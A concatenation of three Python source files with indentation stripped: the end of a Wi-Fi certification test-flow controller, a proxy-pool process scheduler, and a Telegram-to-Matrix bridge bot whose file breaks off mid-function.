TestFlowController.test_mngr_initr.test_configurator.configure(TestFlowController.test_mngr_initr, xml_file_parser)
# end of for loop
if usr_in_cmd.is_testbed_val or usr_in_cmd.is_testcase_val:
TestLogFileSource.log_file_source_obj_list[0].close_log_file(TestLogFileSource.log_file_hdl_list[0]) # TestLogFileSource.log_file_hdl_list[0]
else:
TestLogFileSource.log_file_source_obj_list[0].close_log_file(TestLogFileSource.log_file_hdl_list[0]) # TestLogFileSource.log_file_hdl_list[0]
TestLogFileSource.log_file_source_obj_list[1].close_log_file(TestLogFileSource.log_file_hdl_list[1]) # TestLogFileSource.log_file_hdl_list[1]
TestLogFileSource.log_file_source_obj_list[3].close_log_file(TestLogFileSource.log_file_hdl_list[3])
if TestFlowController.test_mngr_initr.test_config_cxt.is_script_protection_set:
TestFlowController.check_file_integrity()
logging.debug("Executor start...")
count = 0
currNode = TestFlowController.capi_script_parser.qll.head
while currNode is not None:
logging.debug("TAG: " + currNode.tag)
logging.debug(currNode.data)
logging.debug("\n")
#print "GROUP_TAG: " + currNode.group_tag
#print "\n"
currNode = currNode.next
count += 1
logging.debug("the count %s" % str(count))
executor_inst = Executor()
executor_inst.parallel_enable = True
if usr_in_cmd.is_testbed_val or usr_in_cmd.is_testcase_val:
executor_inst.construct_valiadate_q(TestFlowController.test_mngr_initr,
TestFlowController.capi_script_parser,
TestFlowController.test_mngr_initr)
else:
executor_inst.construct_exec_q(TestFlowController.test_mngr_initr,
TestFlowController.capi_script_parser,
TestFlowController.test_mngr_initr)
tbd_list = TestFlowController.test_mngr_initr.test_config_service.get_test_prog_tbd_list("APConfig", "APCONFIG")
if len(tbd_list) == 1:
num_of_aps = 0
if not (TestFlowController.test_mngr_initr.test_config_cxt.is_testbed_validation_set or TestFlowController.test_mngr_initr.test_config_cxt.is_testcase_validation_set):
#for ap in executor_inst.involved_ap_list:
ap_list = TestFlowController.test_mngr_initr.test_config_service.get_test_prog_tbd_list("", "AP")
for ap in ap_list:
logging.debug("%s[%s:%s:%s]" % (ap.dev_name, ap.ctrlipaddr, ap.ctrlport, ap.testipaddr))
if ap.ctrlipaddr == "" and ap.testipaddr != "":
num_of_aps += 1
if ap.ctrlipaddr == tbd_list[0].ctrlipaddr:# and ap.ctrlport == tbd_list[0].ctrlport:
num_of_aps += 1
ps_list = TestFlowController.test_mngr_initr.test_config_service.get_test_prog_tbd_list("PowerSwitch", "POWERSWITCH")
for ps in ps_list:
if ps.ctrlipaddr != "":
num_of_aps += 1
if num_of_aps > 0:
reply = ""
try:
net_cli = NetCommClient(AF_INET,SOCK_STREAM)
net_cli.networkClientSockConnect(tbd_list[0].ctrlipaddr, '8800')
data = "startport=%s" % tbd_list[0].ctrlport + ",numofaps=%s" % num_of_aps
NetCommServer.SOCK_READABLE.remove(net_cli.sock)
NetCommServer.SOCK_WAIT.remove(net_cli.sock)
net_cli.networkClientSockSend(data)
net_cli.networkClientSockTimeout(240)
reply = net_cli.networkClientSockRecv(1024)
except:
if re.search(r"status,ERROR", reply):
logging.error(reply)
#print error msg instead of raise exception..
logging.info("=============================================")
logging.info("Please check AP config agent is running.")
logging.info("END: TEST CASE [%s] " % usr_in_cmd.test_case_id)
elapsed = (time.time() - TestFlowController.start_time)
logging.info("Execution Time [%s] seconds" % round(elapsed,2))
return
#raise Exception(reply)
time.sleep(num_of_aps)
executor_inst.process_exec_q()
#executor_inst.display_completed_q()
if usr_in_cmd.is_testbed_val or usr_in_cmd.is_testcase_val:
tbd_list = TestFlowController.test_mngr_initr.test_prog_mngr.test_prog.testbed_dev_list
program = TestFlowController.test_mngr_initr.prog_name
v = Validation()
ts = v.get_latest_result_session()
if ts is not None:
logging.info('Last validation was at: %s' % str(ts.get('timestamp')))
v.commence_validation(program, tbd_list)
display_val_result.display_validation_res()
return
#logging.info("END: TEST CASE [%s] " % usr_in_cmd.test_case_id)
elapsed = (time.time() - TestFlowController.start_time)
logging.info("Execution Time [%s] seconds" % round(elapsed,2))
#===================================================================
# if TestFlowController.test_mngr_initr.test_config_cxt.is_result_protection_set:
# TestFlowController.get_curr_log_file()
# TestFlowController.save_log_sig()
#===================================================================
except TestScriptVerificationError as tsve:
logging.error(tsve)
raise
except Exception:
# instance.__class__ is the exception class
logging.error('Exception caught!', exc_info=True)
finally:
if usr_in_cmd.is_testbed_val or usr_in_cmd.is_testcase_val:
return
TestLogFileSource.log_file_source_obj_list[2].close_log_file(TestLogFileSource.log_file_hdl_list[2])
if TestFlowController.test_mngr_initr.test_config_cxt.is_result_protection_set:
TestFlowController.get_curr_log_file()
TestFlowController.save_log_sig()
TestFlowController.file_busy.stop_logging()
loggers = logging.getLogger()
for handler in logging.getLogger().handlers:
handler.close()
loggers.removeHandler(handler)
@staticmethod
def print_config_files_info(file_name, is_test_case_file=False):
"""Prepares the log files by initializing handles first and creating files after.
"""
if is_test_case_file:
logging.info("\n %7s Testcase Command File = %s \n" % ("", file_name))
logging.info("START: TEST CASE [%s] " % file_name)
if file_name == GlobalConfigFiles.init_config_file:
logging.info("\n %7s Testcase Init File = %s \n" % ("", file_name))
logging.info("Processing %s file...." % file_name)
logging.info("---------------------------------------\n")
@staticmethod
def get_config_files_list(usr_in_cmd):
"""Prepares the log files by initializing handles first and creating files after.
"""
test_file_source_facotry_list = []
if usr_in_cmd.prog_name == "AC-11AG" or usr_in_cmd.prog_name == "AC-11B" or usr_in_cmd.prog_name == "AC-11N":
test_file_source_facotry_list.append(scriptinfo.scriptsource.TestFileSourceFacotry(GlobalConfigFiles.init_config_file, TestFlowController.test_mngr_initr.test_script_mngr.prog_script_folder_path))
test_file_source_facotry_list.append(scriptinfo.scriptsource.TestFileSourceFacotry(GlobalConfigFiles.init_cmd_file, TestFlowController.test_mngr_initr.test_script_mngr.prog_script_folder_path))
test_file_source_facotry_list.append(scriptinfo.scriptsource.TestFileSourceFacotry(TestFlowController.test_mngr_initr.test_script_mngr.test_case_file, TestFlowController.test_mngr_initr.test_script_mngr.prog_script_folder_path))
return test_file_source_facotry_list
if usr_in_cmd.is_testbed_val or usr_in_cmd.is_testcase_val:
if usr_in_cmd.is_testcase_val:
test_file_source_facotry_list.append(scriptinfo.scriptsource.TestFileSourceFacotry(GlobalConfigFiles.dut_info_file, TestFlowController.test_mngr_initr.test_script_mngr.prog_script_folder_path))
test_file_source_facotry_list.append(scriptinfo.scriptsource.TestFileSourceFacotry(GlobalConfigFiles.master_test_info_file, TestFlowController.test_mngr_initr.test_script_mngr.prog_script_folder_path))
test_file_source_facotry_list.append(scriptinfo.scriptsource.TestFileSourceFacotry(GlobalConfigFiles.init_config_file, TestFlowController.test_mngr_initr.test_script_mngr.prog_script_folder_path))
test_file_source_facotry_list.append(scriptinfo.scriptsource.TestFileSourceFacotry(GlobalConfigFiles.device_id_file, TestFlowController.test_mngr_initr.test_script_mngr.prog_script_folder_path))
else:
test_file_source_facotry_list.append(scriptinfo.scriptsource.TestFileSourceFacotry(GlobalConfigFiles.dut_info_file, TestFlowController.test_mngr_initr.test_script_mngr.prog_script_folder_path))
test_file_source_facotry_list.append(scriptinfo.scriptsource.TestFileSourceFacotry(GlobalConfigFiles.master_test_info_file, TestFlowController.test_mngr_initr.test_script_mngr.prog_script_folder_path))
test_file_source_facotry_list.append(scriptinfo.scriptsource.TestFileSourceFacotry(GlobalConfigFiles.init_config_file, TestFlowController.test_mngr_initr.test_script_mngr.prog_script_folder_path))
test_file_source_facotry_list.append(scriptinfo.scriptsource.TestFileSourceFacotry(GlobalConfigFiles.init_cmd_file, TestFlowController.test_mngr_initr.test_script_mngr.prog_script_folder_path))
test_file_source_facotry_list.append(scriptinfo.scriptsource.TestFileSourceFacotry(TestFlowController.test_mngr_initr.test_script_mngr.test_case_file, TestFlowController.test_mngr_initr.test_script_mngr.prog_script_folder_path))
return test_file_source_facotry_list
@staticmethod
def prepare_log_files(usr_in_cmd):
"""Prepares the log files by initializing handles first and creating files after.
"""
if usr_in_cmd.is_testbed_val or usr_in_cmd.is_testcase_val:
TestLogFileSource.log_file_source_obj_list.append(scriptinfo.scriptsource.TestFileSourceFacotry(GlobalConfigFiles.init_config_log_file, "").file_factory_method())
TestLogFileSource.log_file_source_obj_list[0].create_log_file() # TestLogFileSource.log_file_hdl_list[0]
else:
logging.info("\n*** Running Test - %s *** \n" % usr_in_cmd.test_case_id)
TestLogFileSource.log_file_source_obj_list.append(scriptinfo.scriptsource.TestFileSourceFacotry(GlobalConfigFiles.init_config_log_file, "").file_factory_method())
TestLogFileSource.log_file_source_obj_list.append(scriptinfo.scriptsource.TestFileSourceFacotry(GlobalConfigFiles.pre_test_log_file, "").file_factory_method())
TestLogFileSource.log_file_source_obj_list.append(scriptinfo.scriptsource.TestFileSourceFacotry(usr_in_cmd.test_case_id + ".log", "").file_factory_method())
TestLogFileSource.log_file_source_obj_list.append(scriptinfo.scriptsource.TestFileSourceFacotry(GlobalConfigFiles.html_file, "").file_factory_method())
TestLogFileSource.log_file_source_obj_list[0].create_log_file() # TestLogFileSource.log_file_hdl_list[0]
TestLogFileSource.log_file_source_obj_list[1].create_log_file() # TestLogFileSource.log_file_hdl_list[1]
U = "\n Test ID = [%s] CmdPath = [%s] Prog Name = [%s] initFile =[%s] TBFile =[%s]" % (usr_in_cmd.test_case_id, TestFlowController.test_mngr_initr.test_script_mngr.prog_script_folder_path, usr_in_cmd.prog_name, GlobalConfigFiles.init_config_file, TestFlowController.test_mngr_initr.test_script_mngr.testbed_ap_file)
TestLogFileSource.log_file_source_obj_list[2].init_logging(GlobalConfigFiles.LOG_LEVEL)
TestLogFileSource.log_file_source_obj_list[3].create_log_file()
logging.info("\n Test Info %s" % U)
@staticmethod
def check_file_integrity():
"""Checks the integrity of config files and test script files.
"""
config_file_list = TestFlowController.get_config_file_call_list()
tc_file_list = TestFlowController.get_tc_file_call_list()
file_security_obj = ScriptsSecurity()
for filename in config_file_list:
# allows the validation of configuration file to fail
file_security_obj.validate_single_file(GlobalConfigFiles.curr_prog_name, filename)
for filename in tc_file_list:
tc_vrf_rslt = file_security_obj.validate_single_file(GlobalConfigFiles.curr_prog_name, filename)
if not TestFlowController.test_mngr_initr.test_config_cxt.is_edit_script_flag_set:
if tc_vrf_rslt:
raise TestScriptVerificationError("Script file %s verification failed [current mode %s]" % (filename, TestFlowController.test_mngr_initr.test_config_cxt.user_mode))
@staticmethod
def get_config_file_call_list():
"""Gets a list of config files associated with current test case.
"""
config_file_list = []
config_file_list.append(GlobalConfigFiles.dut_info_file)
config_file_list.append(GlobalConfigFiles.master_test_info_file)
config_file_list.append(GlobalConfigFiles.init_config_file)
config_file_list.append(GlobalConfigFiles.init_cmd_file)
file_chain_dict = sorted(core.parser.TestScriptParser.sub_file_call_dict.items(), key=itemgetter(1))
for fp in file_chain_dict:
#print fp[0]
curr_parent = fp[0].split(':')[0]
curr_child = fp[0].split(':')[1]
curr_indx = fp[0].split(':')[2]
#print "curr_index=%s" % curr_indx
if curr_parent == GlobalConfigFiles.init_config_file or curr_parent == GlobalConfigFiles.init_cmd_file:
if curr_child == GlobalConfigFiles.init_env_file:
continue
config_file_list.append(curr_child)
return config_file_list
@staticmethod
def get_tc_file_call_list():
"""Gets a list of script files associated with current test case.
"""
file_chain_list = []
file_chain_dict = sorted(core.parser.TestScriptParser.sub_file_call_dict.items(), key=itemgetter(1))
for fp in file_chain_dict:
#print fp[0]
curr_parent = fp[0].split(':')[0]
curr_child = fp[0].split(':')[1]
curr_indx = fp[0].split(':')[2]
#print "curr_index=%s" % curr_indx
#if curr_parent in file_chain_list or curr_child in file_chain_list:
# continue
if curr_parent == GlobalConfigFiles.init_config_file or curr_parent == GlobalConfigFiles.init_cmd_file:
continue
if curr_parent == curr_child:
file_chain_list.append(curr_parent)
else:
if curr_parent in file_chain_list and not curr_child in file_chain_list:
file_chain_list.append(curr_child)
if not curr_parent in file_chain_list and curr_child in file_chain_list:
file_chain_list.append(curr_parent)
if not curr_parent in file_chain_list and not curr_child in file_chain_list:
file_chain_list.append(curr_parent)
file_chain_list.append(curr_child)
return file_chain_list
@staticmethod
def get_curr_log_file():
"""Unlocks the current test log file.
"""
TestFlowController.file_busy = ReadFileBusy()
TestFlowController.file_busy.write_string_to_file()
@staticmethod
def save_log_sig():
"""Saves the signature of current test log file to database.
"""
log_file_path = TestScriptSymbolTable.get_value_from_sym_tab("$logFullPath", TestScriptSymbolTable.test_script_sym_tab)
history = historydb.History(GlobalConfigFiles.curr_prog_name, GlobalConfigFiles.curr_tc_name, TestFlowController.test_mngr_initr.test_config_cxt.user_mode, log_file_path)
history_service = historydb.HistoryService(history)
sig = TestFlowController.file_busy.get_file_sig()
#history_service.updateHistoryByLogSig(sig)
#####################################################
blob = TestFlowController.file_busy.set_blob_data()
digest = TestFlowController.file_busy.get_log_digest()
history_service.updateHistoryByLogOuput(blob, sig, digest)
@staticmethod
def get_test_flow_status():
"""Obtains the current test flow status
"""
if TestFlowController.test_mngr_initr is None:
return TestFlowController.TEST_FLOW_STATUS_NOTSTART
else:
if not TestFlowController.executor_inst.mainExecQ.is_empty():
return TestFlowController.TEST_FLOW_STATUS_EXECUTING
else:
return TestFlowController.TEST_FLOW_STATUS_RUNNING
def main():
fec = FrontendCli('AC-11AG AC-11B AC-11N HS2 HS2-R2 N P2P PMF TDLS WFD WMM WPA2 WFDS VHT WMMPS NAN VE')
#sys.argv = ['uwts_ucc.exe', 'WFD', 'WFD-6.1.21B'] #HS2-4.15 HS2-5.6-A
#sys.argv = ['uwts_ucc.exe', '-p', 'VHT', '-t', 'VHT-5.2.1']
#sys.argv = ['uwts_ucc.exe', '-p', 'VHT', '-val']
#sys.argv = ['uwts_ucc.exe', '-p', 'VHT', '-t', 'VHT-5.2.1', '--set-current-usermode', 'matl-mrcl']
#sys.argv = ['uwts_ucc.exe', '-p', 'VHT', '--set-current-usermode', 'atl']
#sys.argv = ['uwts_ucc.exe', '-p', 'VHT', '-t', 'VHT-5.2.1', '-val']
#sys.argv = ['uwts_ucc.exe', '--show-usermode']
#sys.argv = ['uwts_ucc.exe', '-v']
#sys.argv = ['uwts_ucc.exe', '--get-current-usermode']
#sys.argv = ['uwts_ucc.exe', '--set-default-usermode', 'atl']
#sys.argv = ['uwts_ucc.exe', '--set-current-usermode', 'atl']
#print sys.argv
check_cmd_result = fec.fec_register_cmd().fec_check_cli_cmd(sys.argv)
if check_cmd_result is not None and not isinstance(check_cmd_result, argparse.Namespace):
logging.error("Error in command line parse")
exit(1)
GlobalConfigFiles.usr_req_que = UserInteractQueue("REQUEST")
GlobalConfigFiles.usr_resp_que = UserInteractQueue("RESPONSE")
output_str = fec.check_instance(sys.argv)
if output_str != "Start":
return
#register the Queue for FrontendCli
if fec is not None:
#start the tcp server here after one successful cli command
fec_server = FrontendCliServer()
fec_server.register_parent(fec).register_QCB(Cli_Fl_ctrl_req_Q=GlobalConfigFiles.usr_req_que, \
Cli_Fl_ctrl_resp_Q=GlobalConfigFiles.usr_resp_que)
fec_server.start()
else:
logging.error("Remote command not able to activate")
if fec.testProgName is not None:
prog_name = fec.testProgName[0]
#print "progName : " + prog_name
if fec.testCaseName is not None:
script_name = fec.testCaseName[0]
#print "scriptName : " + script_name
Util.get_wts_build_version()
TestFlowController.usr_action_cls = UserRequestAction()
TestFlowController.usr_input_handle_thr = threading.Thread(target=TestFlowController.usr_action_cls.user_request_dispatcher)
TestFlowController.usr_input_handle_thr.start()
fec.handle_cli_cmd(sys.argv)
TestFlowController.start_time = time.time()
timeout = 5
while time.time() < TestFlowController.start_time + timeout:
#print "diff time %s" % (time.time() - start_time)
if TestFlowController.usr_action_cls.usr_in_cmd is not None:
#if prog_name == "AC-11AG" or prog_name == "AC-11B" or prog_name == "AC-11N":
# TestFlowController.usr_action_cls.usr_in_cmd.prog_name = "WMM-AC"
# prog_name = "WMM-AC"
GlobalConfigFiles.init_cmd_file = GlobalConfigFiles.init_cmd_file.replace("##", prog_name)
GlobalConfigFiles.init_config_file = GlobalConfigFiles.init_config_file.replace("##", prog_name)
try:
TestFlowController.start_test_execution_controller(TestFlowController.usr_action_cls.usr_in_cmd)
if TestFlowController.usr_action_cls.usr_in_cmd.is_testbed_val or TestFlowController.usr_action_cls.usr_in_cmd.is_testcase_val:
break
except TestScriptVerificationError:
logging.error("Aborting the test....", exc_info=False)
#logging.error("%s Aborting the test...." % sys.exc_info()[1])
break
except:
logging.error('caught:', exc_info=True)
break
else:
break
TestFlowController.usr_action_cls.is_running = False
TestFlowController.usr_input_handle_thr.join()
if fec_server is not None:
fec_server.stop_server()
fec_server.join()
if __name__ == "__main__":
main()
|
scheduler.py
|
import multiprocessing
import time
from loguru import logger
from proxypool.processors.getter import Getter
from proxypool.processors.server import app
from proxypool.processors.tester import Tester
from proxypool.setting import CYCLE_GETTER, CYCLE_TESTER, API_HOST, API_THREADED, API_PORT, ENABLE_SERVER, \
ENABLE_GETTER, ENABLE_TESTER, IS_WINDOWS
if IS_WINDOWS:
multiprocessing.freeze_support()
tester_process, getter_process, server_process = None, None, None
class Scheduler():
"""
scheduler
"""
def run_tester(self, cycle=CYCLE_TESTER):
"""
run tester
"""
if not ENABLE_TESTER:
logger.info('tester not enabled, exit')
return
tester = Tester()
loop = 0
while True:
logger.debug(f'tester loop {loop} start...')
tester.run()
loop += 1
time.sleep(cycle)
def run_getter(self, cycle=CYCLE_GETTER):
"""
run getter
"""
if not ENABLE_GETTER:
logger.info('getter not enabled, exit')
return
getter = Getter()
loop = 0
while True:
logger.debug(f'getter loop {loop} start...')
getter.run()
loop += 1
time.sleep(cycle)
def run_server(self):
"""
run server for api
"""
if not ENABLE_SERVER:
logger.info('server not enabled, exit')
return
app.run(host=API_HOST, port=API_PORT, threaded=API_THREADED)
def run(self):
global tester_process, getter_process, server_process
try:
logger.info('starting proxypool...')
if ENABLE_TESTER:
tester_process = multiprocessing.Process(target=self.run_tester)
logger.info(f'starting tester, pid {tester_process.pid}...')
tester_process.start()
if ENABLE_GETTER:
getter_process = multiprocessing.Process(target=self.run_getter)
logger.info(f'starting getter, pid{getter_process.pid}...')
getter_process.start()
if ENABLE_SERVER:
server_process = multiprocessing.Process(target=self.run_server)
logger.info(f'starting server, pid{server_process.pid}...')
server_process.start()
tester_process.join()
getter_process.join()
server_process.join()
except KeyboardInterrupt:
logger.info('received keyboard interrupt signal')
tester_process.terminate()
getter_process.terminate()
server_process.terminate()
finally:
# must call join method before calling is_alive
tester_process.join()
getter_process.join()
server_process.join()
logger.info(f'tester is {"alive" if tester_process.is_alive() else "dead"}')
logger.info(f'getter is {"alive" if getter_process.is_alive() else "dead"}')
logger.info(f'server is {"alive" if server_process.is_alive() else "dead"}')
logger.info('proxy terminated')
if __name__ == '__main__':
scheduler = Scheduler()
scheduler.run()
|
bot.py
|
# -*- coding: utf-8 -*-
import logging
import os
import re
import time
from threading import Lock
from threading import Thread
import requests
import telepot
from . import helper
from .helper import download_file
from .helper import pprint_json
from .client import MatrigramClient
BOT_BASE_URL = 'https://api.telegram.org/bot{token}/{path}'
BOT_FILE_URL = 'https://api.telegram.org/file/bot{token}/{file_path}'
logger = logging.getLogger('matrigram')
OPTS_IN_ROW = 4
def logged_in(func):
def func_wrapper(self, msg, *args):
chat_id = msg['chat']['id']
client = self._get_client(chat_id)
if client is None:
self.sendMessage(chat_id,
'You are not logged in. Login to start with /login username password')
return
func(self, msg, *args)
return func_wrapper
def focused(func):
def func_wrapper(self, msg, *args):
chat_id = msg['chat']['id']
client = self._get_client(chat_id)
if not client.get_rooms_aliases():
self.sendMessage(chat_id, 'You are not in any room. Type /join #room to join one.')
return
if not client.have_focus_room():
self.sendMessage(chat_id, 'You don\'t have a room in focus. Type /focus to choose one.')
return
func(self, msg, *args)
return func_wrapper
class MatrigramBot(telepot.Bot):
def __init__(self, *args, **kwargs):
config = kwargs.pop('config')
super(MatrigramBot, self).__init__(*args, **kwargs)
routes = [
(r'^/login (?P<username>\S+) (?P<password>\S+)$', self.login),
(r'^/logout$', self.logout),
(r'^/join\s(?P<room_name>[^$]+)$', self.join_room),
(r'^/leave$', self.leave_room),
(r'^/discover$', self.discover_rooms),
(r'^/focus$', self.change_focus_room),
(r'^/status$', self.status),
(r'^/members$', self.get_members),
(r'^/create_room (?P<room_name>[\S]+)(?P<invitees>\s.*\S)*$', self.create_room),
(r'^/setname\s(?P<matrix_name>[^$]+)$', self.set_name),
(r'^/me (?P<text>[^/].*)$', self.emote),
(r'^(?P<text>[^/].*)$', self.forward_message_to_mc),
]
callback_query_routes = [
(r'^LEAVE (?P<room>\S+)$', self.do_leave),
(r'^FOCUS (?P<room>\S+)$', self.do_change_focus),
(r'^JOIN (?P<room>\S+)$', self.do_join),
(r'^NOP$', self.do_nop),
]
self.routes = [(re.compile(pattern), callback) for pattern, callback in routes]
self.callback_query_routes = [(re.compile(pattern), callback)
for pattern, callback in callback_query_routes]
self.content_type_routes = {
'text': self.on_text_message,
'photo': self.forward_photo_to_mc,
'voice': self.forward_voice_to_mc,
'video': self.forward_video_to_mc,
'document': self.forward_gif_to_mc,
}
# users map telegram_id -> client
self.users = {}
self.config = config
self.users_lock = Lock() # self.users lock for typing related matters
def on_chat_message(self, msg):
"""Main entry point.
This function is our main entry point to the bot.
Messages will be routed according to their content type.
Args:
msg: The message object received from telegram user.
"""
content_type, _, _ = telepot.glance(msg)
logger.debug('content type: %s', content_type)
self.content_type_routes[content_type](msg)
def on_callback_query(self, msg):
"""Handle callback queries.
Route queries using ``self.callback_query_routes``.
Args:
msg: The message object received from telegram user.
"""
data = msg['data']
for route, callback in self.callback_query_routes:
match = route.match(data)
if match:
callback_thread = Thread(target=callback, args=(msg, match))
callback_thread.start()
break
def on_text_message(self, msg):
"""Handle text messages.
Route text messages using ``self.routes``.
Args:
msg: The message object received from telegram user.
"""
text = msg['text'].encode('utf-8')
for route, callback in self.routes:
match = route.match(text)
if match:
callback_thread = Thread(target=callback, args=(msg, match))
callback_thread.start()
# wait for login thread to finish before moving on
if callback == self.login:
callback_thread.join()
break
def login(self, msg, match):
"""Perform login.
Args:
msg: The message object received from telegram user.
match: Match object containing extracted data.
"""
username = match.group('username')
password = match.group('password')
chat_id = msg['chat']['id']
logger.info('telegram user %s, login to %s', chat_id, username)
self.sendChatAction(chat_id, 'typing')
client = MatrigramClient(self.config['server'], self, username)
login_bool, login_message = client.login(username, password)
if login_bool:
self.sendMessage(chat_id, 'Logged in as {}'.format(username))
self.users[chat_id] = {
'client': client,
'typing_thread': None,
'should_type': False,
}
rooms = client.get_rooms_aliases()
logger.debug("rooms are: %s", rooms)
if rooms:
room_aliases = '\n'.join([room_alias[0] for room_alias in rooms.values()])
self.sendMessage(chat_id, 'You are currently in rooms:\n{}'.format(room_aliases))
self.sendMessage(chat_id,
'You are now participating in: {}'.format(
client.get_focus_room_alias()))
logger.debug('%s user state:\n%s', chat_id, self.users[chat_id])
else:
self.sendMessage(chat_id, login_message)
@logged_in
def logout(self, msg, _):
"""Perform logout.
Args:
msg: The message object received from telegram user.
"""
chat_id = msg['chat']['id']
client = self._get_client(chat_id)
logger.info('logout %s', chat_id)
client.logout()
self.users[chat_id]['client'] = None
@logged_in
def join_room(self, msg, match):
chat_id = msg['chat']['id']
client = self._get_client(chat_id)
room_name = match.group('room_name')
ret = client.join_room(room_name)
if not ret:
self.sendMessage(chat_id, 'Can\'t join room')
else:
self.sendMessage(chat_id, "Joined {}".format(room_name))
@logged_in
def leave_room(self, msg, _):
chat_id = msg['chat']['id']
client = self._get_client(chat_id)
rooms = [room[0] for dummy_room_id, room in client.get_rooms_aliases().items()]
if not rooms:
self.sendMessage(chat_id, 'Nothing to leave...')
return
opts = [{'text': room, 'callback_data': 'LEAVE {}'.format(room)} for room in rooms]
keyboard = {
'inline_keyboard': [chunk for chunk in helper.chunks(opts, OPTS_IN_ROW)]
}
self.sendMessage(chat_id, 'Choose a room to leave:', reply_markup=keyboard)
def do_leave(self, msg, match):
query_id, _, _ = telepot.glance(msg, flavor='callback_query')
chat_id = msg['message']['chat']['id']
room_name = match.group('room')
client = self._get_client(chat_id)
prev_focus_room = client.get_focus_room_alias()
client.leave_room(room_name)
self.sendMessage(chat_id, 'Left {}'.format(room_name))
curr_focus_room = client.get_focus_room_alias()
if curr_focus_room != prev_focus_room and curr_focus_room is not None:
self.sendMessage(chat_id,
'You are now participating in: {}'.format(
client.get_focus_room_alias()))
self.answerCallbackQuery(query_id, 'Done!')
@logged_in
def change_focus_room(self, msg, _):
chat_id = msg['chat']['id']
client = self._get_client(chat_id)
rooms = [room[0] for dummy_room_id, room in client.get_rooms_aliases().items()]
if not rooms or len(rooms) == 0:
self.sendMessage(chat_id, 'You need to be at least in one room to use this command.')
return
opts = [{'text': room, 'callback_data': 'FOCUS {}'.format(room)} for room in rooms]
keyboard = {
'inline_keyboard': [chunk for chunk in helper.chunks(opts, OPTS_IN_ROW)]
}
self.sendMessage(chat_id, 'Choose a room to focus:', reply_markup=keyboard)
def do_change_focus(self, msg, match):
query_id, _, _ = telepot.glance(msg, flavor='callback_query')
chat_id = msg['message']['chat']['id']
room_name = match.group('room')
self.sendChatAction(chat_id, 'typing')
client = self._get_client(chat_id)
client.set_focus_room(room_name)
self.sendMessage(chat_id, 'You are now participating in {}'.format(room_name))
self.sendMessage(chat_id, '{} Room history:'.format(room_name))
client.backfill_previous_messages()
self.answerCallbackQuery(query_id, 'Done!')
def do_join(self, msg, match):
query_id, _, _ = telepot.glance(msg, flavor='callback_query')
chat_id = msg['message']['chat']['id']
room_name = match.group('room')
self.sendChatAction(chat_id, 'typing')
client = self._get_client(chat_id)
ret = client.join_room(room_name)
if not ret:
self.answerCallbackQuery(query_id, 'Can\'t join room')
else:
self.answerCallbackQuery(query_id, 'Joined {}'.format(room_name))
def do_nop(self, msg, _):
query_id, _, _ = telepot.glance(msg, flavor='callback_query')
chat_id = msg['message']['chat']['id']
self.sendChatAction(chat_id, 'typing')
self.answerCallbackQuery(query_id, 'OK Boss!')
@logged_in
def status(self, msg, _):
chat_id = msg['chat']['id']
self.sendChatAction(chat_id, 'typing')
client = self._get_client(chat_id)
focus_room = client.get_focus_room_alias()
joined_rooms = client.get_rooms_aliases()
joined_rooms_list = [val[0] for dummy_room_id, val in joined_rooms.items()]
message = '''Status:
Focused room: {}
Joined rooms: {}'''.format(focus_room, helper.list_to_nice_str(joined_rooms_list))
self.sendMessage(chat_id, message)
@logged_in
@focused
def get_members(self, msg, _):
chat_id = msg['chat']['id']
client = self._get_client(chat_id)
l = client.get_members()
# TODO: we need to think how we avoid too long messages, for now send 10 elements
self.sendMessage(chat_id, helper.list_to_nice_str(l[0:10]))
@logged_in
def discover_rooms(self, msg, _):
chat_id = msg['chat']['id']
client = self._get_client(chat_id)
rooms = client.discover_rooms()
self.sendMessage(chat_id, helper.list_to_nice_lines(rooms))
@logged_in
def create_room(self, msg, match):
chat_id = msg['chat']['id']
client = self._get_client(chat_id)
room_alias = match.group('room_name')
invitees = match.group('invitees')
invitees = invitees.split() if invitees else None
room_id, actual_alias = client.create_room(room_alias, is_public=True, invitees=invitees)
if room_id:
self.sendMessage(chat_id,
'Created room {} with room id {}'.format(actual_alias, room_id))
self.sendMessage(chat_id,
'Invitees for the rooms are {}'.format(
helper.list_to_nice_str(invitees)))
else:
self.sendMessage(chat_id, 'Could not create room')
@logged_in
@focused
def forward_message_to_mc(self, msg, match):
text = match.group('text')
chat_id = msg['chat']['id']
from_user = msg['from'].get('username')
if from_user and chat_id < 0:
text = '{}: {}'.format(from_user, text)
client = self._get_client(chat_id)
client.send_message(text)
@logged_in
@focused
def forward_photo_to_mc(self, msg):
chat_id = msg['chat']['id']
client = self._get_client(chat_id)
logger.debug(pprint_json(msg))
file_id = msg['photo'][-1]['file_id']
file_obj = self.getFile(file_id)
file_path = file_obj['file_path']
file_name = os.path.split(file_path)[1]
link = BOT_FILE_URL.format(token=self._token, file_path=file_path)
download_file(link, os.path.join(self.config['media_dir'], file_name))
client.send_photo(os.path.join(self.config['media_dir'], file_name))
@logged_in
@focused
def forward_voice_to_mc(self, msg):
chat_id = msg['chat']['id']
client = self._get_client(chat_id)
file_id = msg['voice']['file_id']
file = self.getFile(file_id)
file_path = file['file_path']
file_name = os.path.split(file_path)[1]
link = BOT_FILE_URL.format(token=self._token, file_path=file_path)
path = os.path.join(self.config['media_dir'], file_name)
download_file(link, path)
client.send_voice(path)
@logged_in
@focused
def forward_video_to_mc(self, msg):
chat_id = msg['chat']['id']
client = self._get_client(chat_id)
file_id = msg['video']['file_id']
file = self.getFile(file_id)
file_path = file['file_path']
file_name = os.path.split(file_path)[1]
link = BOT_FILE_URL.format(token=self._token, file_path=file_path)
path = os.path.join(self.config['media_dir'], file_name)
download_file(link, path)
client.send_video(path)
# gifs are mp4 in telegram
@logged_in
@focused
def forward_gif_to_mc(self, msg):
chat_id = msg['chat']['id']
client = self._get_client(chat_id)
file_id = msg['document']['file_id']
file = self.getFile(file_id)
file_path = file['file_path']
file_name = os.path.split(file_path)[1]
link = BOT_FILE_URL.format(token=self._token, file_path=file_path)
path = os.path.join(self.config['media_dir'], file_name)
download_file(link, path)
client.send_video(path)
def send_message(self, sender, msg, client):
"""Send message to telegram user.
Args:
sender (str): Name of the sender.
msg (str): Text message.
client (MatrigramClient): The client the message is originated in.
Returns:
"""
chat_id = self._get_chat_id(client)
if not chat_id:
return
self.sendChatAction(chat_id, 'typing')
self.sendMessage(chat_id, "{}: {}".format(sender, msg))
def send_emote(self, sender, msg, client):
chat_id = self._get_chat_id(client)
if not chat_id:
return
self.sendChatAction(chat_id, 'typing')
self.sendMessage(chat_id, '* {} {}'.format(sender, msg))
def send_topic(self, sender, topic, client):
chat_id = self._get_chat_id(client)
if not chat_id:
return
